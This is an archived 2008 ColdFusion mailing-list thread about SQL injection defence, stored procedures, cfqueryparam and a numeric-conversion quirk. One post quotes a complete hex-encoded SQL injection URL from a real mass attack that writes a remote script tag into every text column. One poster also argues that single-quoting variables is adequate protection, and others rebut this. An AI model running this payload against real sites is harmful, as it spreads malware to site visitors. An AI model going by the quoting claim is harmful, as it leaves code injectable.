http://www.houseoffusion.com/cf_lists/unsubscribe.cfm?user=89.70.4
RE: (ot) URL Hack Attempt Leaves Me Scractching My Head... For Ma rk Kruger
I went to your site Coldfusionmuse ... Please send vulnerability discoveries to the appropriate individuals, not to mailing lists. Dave Watts, CTO, Fig Leaf Software http://www.figleaf.com/ Fig Leaf Software provides the highest caliber vendor-authorized instruction at our training centers in Washington DC, Atlanta, Chicago, Baltimore, Northern Virginia, or on-site at your location. Visit http://training.figleaf.com/ for more information! ~| Adobe® ColdFusion® 8 software 8 is the most important and dramatic release to date Get the Free Trial http://ad.doubleclick.net/clk;203748912;27390454;j Archive: http://www.houseoffusion.com/groups/CF-Talk/message.cfm/messageid:309474 Subscription: http://www.houseoffusion.com/groups/CF-Talk/subscribe.cfm Unsubscribe: http://www.houseoffusion.com/cf_lists/unsubscribe.cfm?user=89.70.4
RE: (ot) URL Hack Attempt Leaves Me Scractching My Head... For Mark Kruger
Brian and all, I apologize for that. The issue here is not negligence on the part of our excellent team. The problem is that like a lot of dev shops - we don't keep up with our portfolio of customers on our own web site. I have removed the link to Rent Iowa. They have not been an active customer of ours for more than 2 years - and we did not create any of the public facing pages on the site. Still... Here I am with egg on my face. -Mark P.S. - I am expecting a call from them any moment now :) Mark A. Kruger, CFG, MCSE (402) 408-3733 ext 105 www.cfwebtools.com www.coldfusionmuse.com www.necfug.com -Original Message- From: Brian Yager [mailto:[EMAIL PROTECTED] Sent: Tuesday, July 22, 2008 10:22 AM To: CF-Talk Subject: Re: (ot) URL Hack Attempt Leaves Me Scractching My Head... For Mark Kruger Mark, I went to your site Coldfusionmuse to read about that attack. I then noticed the link to cfwebtools at the top. Needing some help with a project, I looked at one of the sites they helped create only to see that same SQL injection attack had succeeded on the site (www.rentiowa.com). Brian This is a popular and very malicious SQL injection attack that is making the rounds: http://www.coldfusionmuse.com/index.cfm/2008/7/18/Injection-Using-CAST- And-A SCII -Mark Mark A. Kruger, CFG, MCSE (402) 408-3733 ext 105 www.cfwebtools.com www.coldfusionmuse.com www.necfug.com Just was looking at a 'user monitor' page on one of my sites and I saw the url string below being called. I've seen several sql injection urls before, but what the heck are they trying to accomplish here? Eeverything is cfqueryparam'ed. Thanks, Che /rss.cfm?';DECLARE @S CHAR(4000);SET @S=CAST(0x4445434C415245204054207661726368617228323535292C4043207661726 36861 72283430303029204445434C415245205461626C655F437572736F7220435552534F522 0464F 522073656C65637420612E6E616D652C622E6E616D652066726F6D207379736F626A656 37473 20612C737973636F6C756D6E73206220776865726520612E69643D622E696420616E642 0612E 78747970653D27752720616E642028622E78747970653D3939206F7220622E787479706 53D33 35206F7220622E78747970653D323331206F7220622E78747970653D31363729204F504 54E20 5461626C655F437572736F72204645544348204E4558542046524F4D20205461626C655 F4375 72736F7220494E544F2040542C4043205748494C4528404046455443485F53544154555 33D30 2920424547494E20657865632827757064617465205B272B40542B275D20736574205B2 72B40 432B275D3D5B272B40432B275D2B2727223E3C2F7469746C653E3C73637269707420737 2633D 22687474703A2F2F312E766572796E782E636E2F772E6A73223E3C2F7363726970743E3 C212D 2D272720776865726520272B40432B27206E6F74206C696B6520272725223E3C2F74697 46C65 3E3C736372697074207372633D22687474703A2F2F312E766572796E782E636E2F772E6 A7322 3E3C2F7363726970743E3C212D2D272727294645544348204E4558542046524F4D20205 46162 6C655F437572736F7220494E544F2040542C404320454E4420434C4F5345205461626C6 55F43 7572736F72204445414C4C4F43415445205461626C655F437572736F72 AS CHAR(4000));EXEC(@S); ~| Adobe® ColdFusion® 8 software 8 is the most important and dramatic release to date Get the Free Trial http://ad.doubleclick.net/clk;203748912;27390454;j Archive: http://www.houseoffusion.com/groups/CF-Talk/message.cfm/messageid:309475 Subscription: http://www.houseoffusion.com/groups/CF-Talk/subscribe.cfm Unsubscribe: http://www.houseoffusion.com/cf_lists/unsubscribe.cfm?user=11502.10531.4
RE: (ot) URL Hack Attempt Leaves Me Scractching My Head... For Ma rk Kruger
It's ok dave... I put myself out there after all -mark -Original Message- From: Dave Watts [mailto:[EMAIL PROTECTED] Sent: Tuesday, July 22, 2008 2:09 PM To: CF-Talk Subject: RE: (ot) URL Hack Attempt Leaves Me Scractching My Head... For Ma rk Kruger I went to your site Coldfusionmuse ... Please send vulnerability discoveries to the appropriate individuals, not to mailing lists. Dave Watts, CTO, Fig Leaf Software http://www.figleaf.com/ Fig Leaf Software provides the highest caliber vendor-authorized instruction at our training centers in Washington DC, Atlanta, Chicago, Baltimore, Northern Virginia, or on-site at your location. Visit http://training.figleaf.com/ for more information! ~| Adobe® ColdFusion® 8 software 8 is the most important and dramatic release to date Get the Free Trial http://ad.doubleclick.net/clk;203748912;27390454;j Archive: http://www.houseoffusion.com/groups/CF-Talk/message.cfm/messageid:309476 Subscription: http://www.houseoffusion.com/groups/CF-Talk/subscribe.cfm Unsubscribe: http://www.houseoffusion.com/cf_lists/unsubscribe.cfm?user=11502.10531.4
cfquery and cfstoredproc
i have been asked to look at a possible sql injection attack. as I look through the code I see stored procs being called by using cfquery like: cfquery name=asdf datasource=asdf storedproc '#var1#', '#var2#' cfquery I've read about using cfstored procs and params to prevent attacks. I've read that using cfquery and doing inline queries can cause injection attacks but I wasn't sure about using cfquery and calling a stored proc through it. Can somebody please confirm? Thanks! Tim ~| Adobe® ColdFusion® 8 software 8 is the most important and dramatic release to date Get the Free Trial http://ad.doubleclick.net/clk;203748912;27390454;j Archive: http://www.houseoffusion.com/groups/CF-Talk/message.cfm/messageid:309477 Subscription: http://www.houseoffusion.com/groups/CF-Talk/subscribe.cfm Unsubscribe: http://www.houseoffusion.com/cf_lists/unsubscribe.cfm?user=89.70.4
RE: cfquery and cfstoredproc
Yes you are vulnerable if you do not sanitize the inputs. Mark A. Kruger, CFG, MCSE (402) 408-3733 ext 105 www.cfwebtools.com www.coldfusionmuse.com www.necfug.com -Original Message- From: Tim Do [mailto:[EMAIL PROTECTED] Sent: Tuesday, July 22, 2008 2:28 PM To: CF-Talk Subject: cfquery and cfstoredproc i have been asked to look at a possible sql injection attack. as I look through the code I see stored procs being called by using cfquery like: cfquery name=asdf datasource=asdf storedproc '#var1#', '#var2#' cfquery I've read about using cfstored procs and params to prevent attacks. I've read that using cfquery and doing inline queries can cause injection attacks but I wasn't sure about using cfquery and calling a stored proc through it. Can somebody please confirm? Thanks! Tim ~| Adobe® ColdFusion® 8 software 8 is the most important and dramatic release to date Get the Free Trial http://ad.doubleclick.net/clk;203748912;27390454;j Archive: http://www.houseoffusion.com/groups/CF-Talk/message.cfm/messageid:309478 Subscription: http://www.houseoffusion.com/groups/CF-Talk/subscribe.cfm Unsubscribe: http://www.houseoffusion.com/cf_lists/unsubscribe.cfm?user=89.70.4
RE: cfquery and cfstoredproc
As you have heard, cfquery is vulnerable to sql injection attacks, so you have to do something. You will hear that cfqueryparam is the best practice for protecting against sql injection attacks, and there is certainly truth to that. However, there are also costs associated with cfqueryparam. (Depending on the version of CF, cfqueryparam disables cachedwithin caching. In all versions of CF, cfqueryparam effectively makes Sql Profiling with SQL Server useless and there is no workaround. This last issue is nearly a show stopper for me.) The code you show below puts single quotes around simple CF variables, and in my book that provides pretty good protection from sql injection attacks. I have not yet heard of a case/argument that shows that the single quote method, when used with simple CF variables, is not safe. (Using the value of a function call or other expression in a cfquery can lead to problems, possibly depending on the version of CF you are using. The problems are due to the weird way that CF doubles single quotes in variable values automatically.) BTW, I do not know if there is a way to safely use a CF variable as part of an ORDER BY clause, but I do know that single quotes there will not work. (It is not valid SQL.) So, code that takes ORDER BY clause elements from url parameters are much tougher to protect and I think should be avoided. Thanks Mark -Original Message- From: Tim Do [mailto:[EMAIL PROTECTED] Sent: Tuesday, July 22, 2008 3:28 PM To: CF-Talk Subject: cfquery and cfstoredproc i have been asked to look at a possible sql injection attack. as I look through the code I see stored procs being called by using cfquery like: cfquery name=asdf datasource=asdf storedproc '#var1#', '#var2#' cfquery I've read about using cfstored procs and params to prevent attacks. I've read that using cfquery and doing inline queries can cause injection attacks but I wasn't sure about using cfquery and calling a stored proc through it. Can somebody please confirm? Thanks! Tim ~| Adobe® ColdFusion® 8 software 8 is the most important and dramatic release to date Get the Free Trial http://ad.doubleclick.net/clk;203748912;27390454;j Archive: http://www.houseoffusion.com/groups/CF-Talk/message.cfm/messageid:309479 Subscription: http://www.houseoffusion.com/groups/CF-Talk/subscribe.cfm Unsubscribe: http://www.houseoffusion.com/cf_lists/unsubscribe.cfm?user=89.70.4
Re: cfquery and cfstoredproc
(Depending on the version of CF, cfqueryparam disables cachedwithin caching. This is true, but it doesn't prevent you from baking your own caching mechanism as many have done. In all versions of CF, cfqueryparam effectively makes Sql Profiling with SQL Server useless and there is no workaround. Please explain what you mean. Are you saying you can't run a trace and see your SQL running. That is certainly not true. It may complicate seeing the valuf of your input parameters. peronally I use SeeFusion to watch my SQL traffic. I can debug a single users's IP and it shows me all the parameters being passed in. The code you show below puts single quotes around simple CF variables, and in my book that provides pretty good protection from sql injection attacks. I have not yet heard of a case/argument that shows that the single quote method, when used with simple CF variables, is not safe. Now you have: http://www.codersrevolution.com/index.cfm/2008/7/13/Just-when-you-felt-safe-SQL-Injection-and-MySQL http://www.coldfusionmuse.com/index.cfm/2008/5/16/disable-backslash-escape-on-mysql BTW, I do not know if there is a way to safely use a CF variable as part of an ORDER BY clause, I outlined what I believe to be the only way to this here: http://www.codersrevolution.com/index.cfm/2008/7/22/When-will-cfqueryparam-NOT-protect-me ~Brad ~| Adobe® ColdFusion® 8 software 8 is the most important and dramatic release to date Get the Free Trial http://ad.doubleclick.net/clk;203748912;27390454;j Archive: http://www.houseoffusion.com/groups/CF-Talk/message.cfm/messageid:309480 Subscription: http://www.houseoffusion.com/groups/CF-Talk/subscribe.cfm Unsubscribe: http://www.houseoffusion.com/cf_lists/unsubscribe.cfm?user=11502.10531.4
RE: cfquery and cfstoredproc
A couple of approaches to order by http://www.coldfusionmuse.com/index.cfm/2008/7/21/SQL-injection-using-order- by Mark A. Kruger, CFG, MCSE (402) 408-3733 ext 105 www.cfwebtools.com www.coldfusionmuse.com www.necfug.com -Original Message- From: Brad Wood [mailto:[EMAIL PROTECTED] Sent: Tuesday, July 22, 2008 3:46 PM To: CF-Talk Subject: Re: cfquery and cfstoredproc (Depending on the version of CF, cfqueryparam disables cachedwithin caching. This is true, but it doesn't prevent you from baking your own caching mechanism as many have done. In all versions of CF, cfqueryparam effectively makes Sql Profiling with SQL Server useless and there is no workaround. Please explain what you mean. Are you saying you can't run a trace and see your SQL running. That is certainly not true. It may complicate seeing the valuf of your input parameters. peronally I use SeeFusion to watch my SQL traffic. I can debug a single users's IP and it shows me all the parameters being passed in. The code you show below puts single quotes around simple CF variables, and in my book that provides pretty good protection from sql injection attacks. I have not yet heard of a case/argument that shows that the single quote method, when used with simple CF variables, is not safe. Now you have: http://www.codersrevolution.com/index.cfm/2008/7/13/Just-when-you-felt-safe- SQL-Injection-and-MySQL http://www.coldfusionmuse.com/index.cfm/2008/5/16/disable-backslash-escape-o n-mysql BTW, I do not know if there is a way to safely use a CF variable as part of an ORDER BY clause, I outlined what I believe to be the only way to this here: http://www.codersrevolution.com/index.cfm/2008/7/22/When-will-cfqueryparam-N OT-protect-me ~Brad ~| Adobe® ColdFusion® 8 software 8 is the most important and dramatic release to date Get the Free Trial http://ad.doubleclick.net/clk;203748912;27390454;j Archive: http://www.houseoffusion.com/groups/CF-Talk/message.cfm/messageid:309482 Subscription: http://www.houseoffusion.com/groups/CF-Talk/subscribe.cfm Unsubscribe: http://www.houseoffusion.com/cf_lists/unsubscribe.cfm?user=89.70.4
RE: cfquery and cfstoredproc
I've used this function to view the SQL with the param data in place.
cffunction name=executedSQL
cfargument name=result
cfset var LOCAL = {}
cfset LOCAL.sqlString = ARGUMENTS.result.sql
cfif StructKeyExists(ARGUMENTS.result, sqlParameters)
cfset LOCAL.params = ARGUMENTS.result.sqlParameters
cfloop array=#LOCAL.params# index=LOCAL.param
cfif NOT IsNumeric(LOCAL.param)
cfset LOCAL.param = ' LOCAL.param '
/cfif
cfset LOCAL.sqlString = ReplaceNoCase(LOCAL.sqlString,
?, LOCAL.param,
ONE)
/cfloop
/cfif
cfreturn pre LOCAL.sqlString /pre
/cffunction
cfquery name=testQuery datasource=yourDS result=r
SELECT *
FROM myTable
WHERE myColumn = cfqueryparam cfsqltype=CF_SQL_INTEGER
value=#someVar#
AND myOtherColumn = cfqueryparam cfsqltype=CF_SQL_VARCHAR
value=#anotherVar#
/cfquery
cfoutput#executedSQL(r)#/cfoutput
Adrian
www.adrianlynch.co.uk
-Original Message-
From: Brad Wood [mailto:[EMAIL PROTECTED]
Sent: 22 July 2008 21:46
To: CF-Talk
Subject: Re: cfquery and cfstoredproc
In all versions of CF, cfqueryparam effectively makes Sql Profiling with
SQL Server useless and there is no workaround.
Please explain what you mean. Are you saying you can't run a trace and see
your SQL running. That is certainly not true. It may complicate seeing the
valuf of your input parameters. peronally I use SeeFusion to watch my SQL
traffic. I can debug a single users's IP and it shows me all the parameters
being passed in.
~Brad
~|
Adobe® ColdFusion® 8 software 8 is the most important and dramatic release to
date
Get the Free Trial
http://ad.doubleclick.net/clk;203748912;27390454;j
Archive:
http://www.houseoffusion.com/groups/CF-Talk/message.cfm/messageid:309481
Subscription: http://www.houseoffusion.com/groups/CF-Talk/subscribe.cfm
Unsubscribe:
http://www.houseoffusion.com/cf_lists/unsubscribe.cfm?user=11502.10531.4
Re: (ot) URL Hack Attempt Leaves Me Scractching My Head... For Ma rk Kruger
you are correct Dave.. Mark..I apologize for my post. I thought it was interesting following the links from the original thread to see a site with that exact attack. Brian I went to your site Coldfusionmuse ... Please send vulnerability discoveries to the appropriate individuals, not to mailing lists. Dave Watts, CTO, Fig Leaf Software http://www.figleaf.com/ Fig Leaf Software provides the highest caliber vendor-authorized instruction at our training centers in Washington DC, Atlanta, Chicago, Baltimore, Northern Virginia, or on-site at your location. Visit http://training.figleaf.com/ for more information! ~| Adobe® ColdFusion® 8 software 8 is the most important and dramatic release to date Get the Free Trial http://ad.doubleclick.net/clk;203748912;27390454;j Archive: http://www.houseoffusion.com/groups/CF-Talk/message.cfm/messageid:309483 Subscription: http://www.houseoffusion.com/groups/CF-Talk/subscribe.cfm Unsubscribe: http://www.houseoffusion.com/cf_lists/unsubscribe.cfm?user=89.70.4
Re: (ot) URL Hack Attempt Leaves Me Scractching My Head... For Mark Kruger
Mark, I apologize for posting it the way I did. I did find it interesting finding the exact attack on a site that was being discussed in the thread. Please forgive me. Brian Brian and all, I apologize for that. The issue here is not negligence on the part of our excellent team. The problem is that like a lot of dev shops - we don't keep up with our portfolio of customers on our own web site. I have removed the link to Rent Iowa. They have not been an active customer of ours for more than 2 years - and we did not create any of the public facing pages on the site. Still... Here I am with egg on my face. -Mark P.S. - I am expecting a call from them any moment now :) Mark A. Kruger, CFG, MCSE (402) 408-3733 ext 105 www.cfwebtools.com www.coldfusionmuse.com www.necfug.com Kruger Mark, I went to your site Coldfusionmuse to read about that attack. I then noticed the link to cfwebtools at the top. Needing some help with a project, I looked at one of the sites they helped create only to see that same SQL injection attack had succeeded on the site (www.rentiowa.com). Brian ~| Adobe® ColdFusion® 8 software 8 is the most important and dramatic release to date Get the Free Trial http://ad.doubleclick.net/clk;203748912;27390454;j Archive: http://www.houseoffusion.com/groups/CF-Talk/message.cfm/messageid:309484 Subscription: http://www.houseoffusion.com/groups/CF-Talk/subscribe.cfm Unsubscribe: http://www.houseoffusion.com/cf_lists/unsubscribe.cfm?user=89.70.4
RE: (ot) URL Hack Attempt Leaves Me Scractching My Head... For Ma rk Kruger
Brian, No worries. You just cost me an hour of my life approving changes to our portfolio section (ha). -mark -Original Message- From: Brian Yager [mailto:[EMAIL PROTECTED] Sent: Tuesday, July 22, 2008 3:52 PM To: CF-Talk Subject: Re: (ot) URL Hack Attempt Leaves Me Scractching My Head... For Ma rk Kruger you are correct Dave.. Mark..I apologize for my post. I thought it was interesting following the links from the original thread to see a site with that exact attack. Brian I went to your site Coldfusionmuse ... Please send vulnerability discoveries to the appropriate individuals, not to mailing lists. Dave Watts, CTO, Fig Leaf Software http://www.figleaf.com/ Fig Leaf Software provides the highest caliber vendor-authorized instruction at our training centers in Washington DC, Atlanta, Chicago, Baltimore, Northern Virginia, or on-site at your location. Visit http://training.figleaf.com/ for more information! ~| Adobe® ColdFusion® 8 software 8 is the most important and dramatic release to date Get the Free Trial http://ad.doubleclick.net/clk;203748912;27390454;j Archive: http://www.houseoffusion.com/groups/CF-Talk/message.cfm/messageid:309485 Subscription: http://www.houseoffusion.com/groups/CF-Talk/subscribe.cfm Unsubscribe: http://www.houseoffusion.com/cf_lists/unsubscribe.cfm?user=89.70.4
RE: cfquery and cfstoredproc
Hi Brad Thanks for the links, those are interesting articles. The problem with MS SQL Profiler and cfqueryparam is that the sql that arrives at the sql server replaces the literal sql with something like sp_exec 72 (I forget the actual sp name) followed by the parameters (which are easily visible); the 72 is all that identifies the actual sql statement and there is no way to convert 72 into the actual sql statement... the id is valid only within the current connection. I use SQL profiler to find slow queries coming from anywhere in the network, including the multiple web servers and other processes that run our web site. It also shows lots of SQL server internal stats which make debugging slow queries much, much easier... just having execution times is not always helpful, and seeing all of the concurrently running queries is pretty much required for complex cases. What stinks is that all Adobe has to do is provide an alternative mode for cfqueryparam that does not use binding (but does do other required data validation), and I could enable it as I see fit. Then everyone in the world could agree that cfqueryparam is great and should be used in all cases. (I know, I know... implementing the required validation is easier said than done. I didn't say it would be trivial to do.) The other potential fix that I would absolutely live with is if the sp_exec 72... SQL included a SQL comment that showed a form of the original query. That would be enough for me to go on. This kind of change would almost certainly require changes at or near the JDBC call layer so, unless I can swap in a different JDBC driver, there isn't much hope of doing this independently of Adobe. (Actually, it looks like it is possible to use non-standard JDBC drivers... Hmm... I wonder what kind of trouble I can get myself into with this capability.) BTW, that MySQL hack with quoted back ticks sounds like hell. I'm not trying to start a MS SQL vs MySQL thing here, but damn, that really sucks and probably makes a ton of web sites vulnerable. (And yes, this does provide an example of when back ticks are insufficient, so now I know.) Thanks for the info. Mark -Original Message- From: Brad Wood [mailto:[EMAIL PROTECTED] Sent: Tuesday, July 22, 2008 4:46 PM To: CF-Talk Subject: Re: cfquery and cfstoredproc (Depending on the version of CF, cfqueryparam disables cachedwithin caching. This is true, but it doesn't prevent you from baking your own caching mechanism as many have done. In all versions of CF, cfqueryparam effectively makes Sql Profiling with SQL Server useless and there is no workaround. Please explain what you mean. Are you saying you can't run a trace and see your SQL running. That is certainly not true. It may complicate seeing the valuf of your input parameters. peronally I use SeeFusion to watch my SQL traffic. I can debug a single users's IP and it shows me all the parameters being passed in. The code you show below puts single quotes around simple CF variables, and in my book that provides pretty good protection from sql injection attacks. I have not yet heard of a case/argument that shows that the single quote method, when used with simple CF variables, is not safe. Now you have: http://www.codersrevolution.com/index.cfm/2008/7/13/Just-when-you-felt-s afe-SQL-Injection-and-MySQL http://www.coldfusionmuse.com/index.cfm/2008/5/16/disable-backslash-esca pe-on-mysql BTW, I do not know if there is a way to safely use a CF variable as part of an ORDER BY clause, I outlined what I believe to be the only way to this here: http://www.codersrevolution.com/index.cfm/2008/7/22/When-will-cfquerypar am-NOT-protect-me ~Brad ~| Adobe® ColdFusion® 8 software 8 is the most important and dramatic release to date Get the Free Trial http://ad.doubleclick.net/clk;203748912;27390454;j Archive: http://www.houseoffusion.com/groups/CF-Talk/message.cfm/messageid:309486 Subscription: http://www.houseoffusion.com/groups/CF-Talk/subscribe.cfm Unsubscribe: http://www.houseoffusion.com/cf_lists/unsubscribe.cfm?user=89.70.4
Re: cfquery and cfstoredproc
Thanks Adrian. That's cool. however, it is not useful DURING the execution of the SQL though correct? ~Brad - Original Message - From: Adrian Lynch [EMAIL PROTECTED] To: CF-Talk cf-talk@houseoffusion.com Sent: Tuesday, July 22, 2008 3:51 PM Subject: RE: cfquery and cfstoredproc I've used this function to view the SQL with the param data in place. ~| Adobe® ColdFusion® 8 software 8 is the most important and dramatic release to date Get the Free Trial http://ad.doubleclick.net/clk;203748912;27390454;j Archive: http://www.houseoffusion.com/groups/CF-Talk/message.cfm/messageid:309487 Subscription: http://www.houseoffusion.com/groups/CF-Talk/subscribe.cfm Unsubscribe: http://www.houseoffusion.com/cf_lists/unsubscribe.cfm?user=89.70.4
('1,1') * 1 = 39448
I tracked down a defect to a piece of code which basically did the
following:
total = form.quantity * form.itemamount
In some cases, form.quantity is commong through as *1,1* which is presumably
due to an HTML issue with duplicate form fields with the same name.
But rather than getting a CF error cos 1,1 isn't a number, it evaluates to
39448!
i.e.
cfoutput'1,1' * 1 = #'1,1' * 1#/cfoutput
produces:
'1,1' * 1 = 39448
I'm not worried about the original problem with the form.quantity coming
though as *1,1* rather than the expected *1* since I can fix that, but i'm
curious as to any reason for this odd result.
It looks like (x,y) * 1 is the same as (y,x) * 1
In other words
cfoutput#'5,23' * 1# = #'23,5' * 1# = 39591/cfoutput
As i say, i'm not worried about fixing the defect, but i'm just curious if
there is an underlying explanation for the apparently wierd behaviour. Or is
it just a bug in the way CF does the conversion?
Cheers
Bert
p.s. FWIW here's a snippet which will create a 101 square grid of all the
combinations:
table border=1
cfloop from=0 to=100 index=i
tr
cfloop from=0 to=100 index=j
td nowrap=true#wtf(i,j)#/td
/cfloop
/tr
/cfloop
/table
cfscript
function wtf(a,b) {
var x = '#a#,#b#';
try {
return '#x#*1 = ' x*1;
}
catch(Any E) {
return '#x#*1 pukes';
}
}
/cfscript
~|
Adobe® ColdFusion® 8 software 8 is the most important and dramatic release to
date
Get the Free Trial
http://ad.doubleclick.net/clk;203748912;27390454;j
Archive:
http://www.houseoffusion.com/groups/CF-Talk/message.cfm/messageid:309488
Subscription: http://www.houseoffusion.com/groups/CF-Talk/subscribe.cfm
Unsubscribe:
http://www.houseoffusion.com/cf_lists/unsubscribe.cfm?user=11502.10531.4
Re: cfquery and cfstoredproc
I see. Thanks for the clarification on the Profiler stuff. Unfortunately, I don't MSSQL in front of me to play with it right now. I give SeeFusion two thumbs way up on monitoring your SQL traffic and run times. (it incorporates a JDBC URL wrapper) I use a custom monitor I wrote for SQL server 2005 that gets the execution plans for me of my running SQL that I tied into the SeeFusion API. If I see a spike on the server, I can see who is doing it, what page they are on, what line of SQL is executing and what their execution plan is all at once. ~Brad - Original Message - From: Gaulin, Mark [EMAIL PROTECTED] To: CF-Talk cf-talk@houseoffusion.com Sent: Tuesday, July 22, 2008 4:34 PM Subject: RE: cfquery and cfstoredproc Hi Brad Thanks for the links, those are interesting articles. ~| Adobe® ColdFusion® 8 software 8 is the most important and dramatic release to date Get the Free Trial http://ad.doubleclick.net/clk;203748912;27390454;j Archive: http://www.houseoffusion.com/groups/CF-Talk/message.cfm/messageid:309489 Subscription: http://www.houseoffusion.com/groups/CF-Talk/subscribe.cfm Unsubscribe: http://www.houseoffusion.com/cf_lists/unsubscribe.cfm?user=11502.10531.4
RE: ('1,1') * 1 = 39448
Looked like it could be a ColdFusion date value to me. So I did a
dateFormat() on that and came up with 01/01/2008:
cfset nValue = 1,1 * 1
cfoutput#dateFormat(nValue,mm/dd/)#brbr/cfoutput
It's assuming 1,1 is the current month and year. I did the same for
5,23 * 1 and got 05/23/2008.
What's really fun is if you do 1,1 * 2..
Go ahead... see what you get. 10/15/2116
Now go figure THAT one out!
Dave Phillips
-Original Message-
From: Bert Dawson [mailto:[EMAIL PROTECTED]
Sent: Tuesday, July 22, 2008 5:08 PM
To: CF-Talk
Subject: ('1,1') * 1 = 39448
I tracked down a defect to a piece of code which basically did the
following:
total = form.quantity * form.itemamount
In some cases, form.quantity is commong through as *1,1* which is presumably
due to an HTML issue with duplicate form fields with the same name.
But rather than getting a CF error cos 1,1 isn't a number, it evaluates to
39448!
i.e.
cfoutput'1,1' * 1 = #'1,1' * 1#/cfoutput
produces:
'1,1' * 1 = 39448
I'm not worried about the original problem with the form.quantity coming
though as *1,1* rather than the expected *1* since I can fix that, but i'm
curious as to any reason for this odd result.
It looks like (x,y) * 1 is the same as (y,x) * 1
In other words
cfoutput#'5,23' * 1# = #'23,5' * 1# = 39591/cfoutput
As i say, i'm not worried about fixing the defect, but i'm just curious if
there is an underlying explanation for the apparently wierd behaviour. Or is
it just a bug in the way CF does the conversion?
Cheers
Bert
p.s. FWIW here's a snippet which will create a 101 square grid of all the
combinations:
table border=1
cfloop from=0 to=100 index=i
tr
cfloop from=0 to=100 index=j
td nowrap=true#wtf(i,j)#/td
/cfloop
/tr
/cfloop
/table
cfscript
function wtf(a,b) {
var x = '#a#,#b#';
try {
return '#x#*1 = ' x*1;
}
catch(Any E) {
return '#x#*1 pukes';
}
}
/cfscript
~|
Adobe® ColdFusion® 8 software 8 is the most important and dramatic release to
date
Get the Free Trial
http://ad.doubleclick.net/clk;203748912;27390454;j
Archive:
http://www.houseoffusion.com/groups/CF-Talk/message.cfm/messageid:309490
Subscription: http://www.houseoffusion.com/groups/CF-Talk/subscribe.cfm
Unsubscribe:
http://www.houseoffusion.com/cf_lists/unsubscribe.cfm?user=11502.10531.4
RE: cfquery and cfstoredproc
i have been asked to look at a possible sql injection attack. as I look through the code I see stored procs being called by using cfquery like: cfquery name=asdf datasource=asdf storedproc '#var1#', '#var2#' cfquery I've read about using cfstored procs and params to prevent attacks. I've read that using cfquery and doing inline queries can cause injection attacks but I wasn't sure about using cfquery and calling a stored proc through it. Can somebody please confirm? Yes you are vulnerable if you do not sanitize the inputs. Actually, generally you won't be vulnerable here. You're calling a stored procedure, which is going to take your inputs and stick them in input parameters. As long as you're not executing strings directly in your stored procedure (using EXEC, EXECUTE, sp_executesql, etc) you'll be fine. Dave Watts, CTO, Fig Leaf Software http://www.figleaf.com/ Fig Leaf Software provides the highest caliber vendor-authorized instruction at our training centers in Washington DC, Atlanta, Chicago, Baltimore, Northern Virginia, or on-site at your location. Visit http://training.figleaf.com/ for more information! ~| Adobe® ColdFusion® 8 software 8 is the most important and dramatic release to date Get the Free Trial http://ad.doubleclick.net/clk;203748912;27390454;j Archive: http://www.houseoffusion.com/groups/CF-Talk/message.cfm/messageid:309491 Subscription: http://www.houseoffusion.com/groups/CF-Talk/subscribe.cfm Unsubscribe: http://www.houseoffusion.com/cf_lists/unsubscribe.cfm?user=89.70.4
RE: cfquery and cfstoredproc
Dave, What about a semi-colon? Storedproc '#var1#','#var2#' ; *other code* Would the CFQUERY not allow this additional code to run? -Mark Mark A. Kruger, CFG, MCSE (402) 408-3733 ext 105 www.cfwebtools.com www.coldfusionmuse.com www.necfug.com -Original Message- From: Dave Watts [mailto:[EMAIL PROTECTED] Sent: Tuesday, July 22, 2008 5:50 PM To: CF-Talk Subject: RE: cfquery and cfstoredproc i have been asked to look at a possible sql injection attack. as I look through the code I see stored procs being called by using cfquery like: cfquery name=asdf datasource=asdf storedproc '#var1#', '#var2#' cfquery I've read about using cfstored procs and params to prevent attacks. I've read that using cfquery and doing inline queries can cause injection attacks but I wasn't sure about using cfquery and calling a stored proc through it. Can somebody please confirm? Yes you are vulnerable if you do not sanitize the inputs. Actually, generally you won't be vulnerable here. You're calling a stored procedure, which is going to take your inputs and stick them in input parameters. As long as you're not executing strings directly in your stored procedure (using EXEC, EXECUTE, sp_executesql, etc) you'll be fine. Dave Watts, CTO, Fig Leaf Software http://www.figleaf.com/ Fig Leaf Software provides the highest caliber vendor-authorized instruction at our training centers in Washington DC, Atlanta, Chicago, Baltimore, Northern Virginia, or on-site at your location. Visit http://training.figleaf.com/ for more information! ~| Adobe® ColdFusion® 8 software 8 is the most important and dramatic release to date Get the Free Trial http://ad.doubleclick.net/clk;203748912;27390454;j Archive: http://www.houseoffusion.com/groups/CF-Talk/message.cfm/messageid:309492 Subscription: http://www.houseoffusion.com/groups/CF-Talk/subscribe.cfm Unsubscribe: http://www.houseoffusion.com/cf_lists/unsubscribe.cfm?user=11502.10531.4
RE: cfquery and cfstoredproc
What about a semi-colon? Storedproc '#var1#','#var2#' ; *other code* Would the CFQUERY not allow this additional code to run? It wouldn't allow any of the values after the stored procedure call storedproc to run as code, because they would be placed in the input parameters of the stored procedure. Essentially, this has the same effect as parameterizing your query in CF. Dave Watts, CTO, Fig Leaf Software http://www.figleaf.com/ Fig Leaf Software provides the highest caliber vendor-authorized instruction at our training centers in Washington DC, Atlanta, Chicago, Baltimore, Northern Virginia, or on-site at your location. Visit http://training.figleaf.com/ for more information! ~| Adobe® ColdFusion® 8 software 8 is the most important and dramatic release to date Get the Free Trial http://ad.doubleclick.net/clk;203748912;27390454;j Archive: http://www.houseoffusion.com/groups/CF-Talk/message.cfm/messageid:309493 Subscription: http://www.houseoffusion.com/groups/CF-Talk/subscribe.cfm Unsubscribe: http://www.houseoffusion.com/cf_lists/unsubscribe.cfm?user=11502.10531.4
RE: cfquery and cfstoredproc
So I'm hearing that it should be fine?? Somehow their database columns values were appended the following string : /titleInvalidTag src=http://1.verynx.cn/w.js;/script!-- So for example the column firstname value was John became: John/titleInvalidTag src=http://1.verynx.cn/w.js;/script!-- What else could have caused this? Like you said the parameters are in single quotes and the data type is varchar so it must have a single quote in order to work. I'm confused... -Original Message- From: Mark Kruger [mailto:[EMAIL PROTECTED] Sent: Tuesday, July 22, 2008 3:52 PM To: CF-Talk Subject: RE: cfquery and cfstoredproc Dave, What about a semi-colon? Storedproc '#var1#','#var2#' ; *other code* Would the CFQUERY not allow this additional code to run? -Mark Mark A. Kruger, CFG, MCSE (402) 408-3733 ext 105 www.cfwebtools.com www.coldfusionmuse.com www.necfug.com -Original Message- From: Dave Watts [mailto:[EMAIL PROTECTED] Sent: Tuesday, July 22, 2008 5:50 PM To: CF-Talk Subject: RE: cfquery and cfstoredproc i have been asked to look at a possible sql injection attack. as I look through the code I see stored procs being called by using cfquery like: cfquery name=asdf 